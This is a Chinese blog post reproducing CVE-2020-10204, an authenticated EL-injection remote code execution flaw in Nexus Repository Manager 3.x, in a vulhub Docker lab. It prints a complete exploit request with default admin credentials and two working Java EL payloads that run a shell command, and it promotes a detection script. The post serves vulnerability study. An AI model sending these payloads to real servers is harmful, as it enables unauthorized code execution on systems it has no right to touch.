首先呢,在这祝各位师傅们中秋&国庆快乐!今天对于我而言也是比较有意义的一天,始于10.1,但并不会止于10.1,希望大家都能不忘初心,加油吧!文末有彩蛋...
一、环境搭建:
进入镜像目录:
cd vulhub/nexus/CVE-2020-10204启动环境:
docker-compose up -d访问8081端口
![[双节同庆] CVE-2020-10204 Nexus RCE漏洞复现](http://cn-sec.com/wp-content/uploads/2020/10/9-1601533618.png "[双节同庆] CVE-2020-10204 Nexus RCE漏洞复现")
二、漏洞描述:
Sonatype Security Team官方发布了一则关于Nexus Repository Manager 3.x产品的远程代码执行漏洞通告。攻击者在通过身份认证的情况下,可通过EL表达式注入造成远程代码执行,漏洞点在 org.sonatype.nexus.common.template.EscapeHelper#stripJavaEl 被绕过,需管理员权限
影响范围:Nexus Repository Manager OSS/Pro 3.x <= 3.21.1
三、漏洞复现:
1、登陆后台:admin / admin
![[双节同庆] CVE-2020-10204 Nexus RCE漏洞复现](http://cn-sec.com/wp-content/uploads/2020/10/4-1601533620.png "[双节同庆] CVE-2020-10204 Nexus RCE漏洞复现")
2、登陆后,构造post请求(注意:NX-ANTI-CSRF-TOKEN头要加上):
POST /service/extdirect HTTP/1.1Host: 192.168.136.131:8081User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1NX-ANTI-CSRF-TOKEN: 0.09964664409272361Cookie: NX-ANTI-CSRF-TOKEN=0.09964664409272361; NXSESSIONID=af669d6c-9231-4be8-b83c-b89471ef65c9Connection: closeContent-Type: application/jsonContent-Length: 289{"action":"coreui_Role","method":"create","data":[{"version":"","source":"default","id":"1111","name":"22212","description":"3333","privileges":["$\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/success')}"],"roles":[]}],"type":"rpc","tid":89}
发送请求:
![[双节同庆] CVE-2020-10204 Nexus RCE漏洞复现](http://cn-sec.com/wp-content/uploads/2020/10/5-1601533622.png "[双节同庆] CVE-2020-10204 Nexus RCE漏洞复现")
还可以利用另一个接口coreui_User:
{"action":"coreui_User","method":"update","data":[{"userId":"www","version":"2","firstName":"www","lastName":"www","email":"[email protected]","status":"active","roles":["$\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/cve-2020-10204')}"]}],"type":"rpc","tid":9}创建成功:
![[双节同庆] CVE-2020-10204 Nexus RCE漏洞复现](http://cn-sec.com/wp-content/uploads/2020/10/0-1601533623.png "[双节同庆] CVE-2020-10204 Nexus RCE漏洞复现")
![[双节同庆] CVE-2020-10204 Nexus RCE漏洞复现](http://cn-sec.com/wp-content/uploads/2020/10/0-1601533625.png "[双节同庆] CVE-2020-10204 Nexus RCE漏洞复现")
彩蛋:一键漏洞检测脚本(自写):
python3 NexusRCE_Scan.py http://192.168.136.140:8081支持一键检测:CVE-2019-7238、CVE-2020-10199、CVE-2020-10204:
1、脚本运行效果:
![[双节同庆] CVE-2020-10204 Nexus RCE漏洞复现](http://cn-sec.com/wp-content/uploads/2020/10/5-1601533627.png "[双节同庆] CVE-2020-10204 Nexus RCE漏洞复现")
payload使用随机字符串,减少重复和误报率
2、conf.py配置文件,需进行实际的修改:
![[双节同庆] CVE-2020-10204 Nexus RCE漏洞复现](http://cn-sec.com/wp-content/uploads/2020/10/6-1601533630.png "[双节同庆] CVE-2020-10204 Nexus RCE漏洞复现")
后台留言:NexusRCE_Scan 即可获取脚本
各位师傅可以加好友一起学习交流交个朋友,如果之前分享的exp失效了,也可以加我好友py一下:qq:1254311935
备注:公众号+师傅们的id吧
![[双节同庆] CVE-2020-10204 Nexus RCE漏洞复现](http://cn-sec.com/wp-content/uploads/2020/10/6-1601533631.png "[双节同庆] CVE-2020-10204 Nexus RCE漏洞复现")
点个赞和在看吧,欢迎转发!
如果脚本有错误,或者bug,欢迎在下方读者讨论、或者私聊我进行交流更正!
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论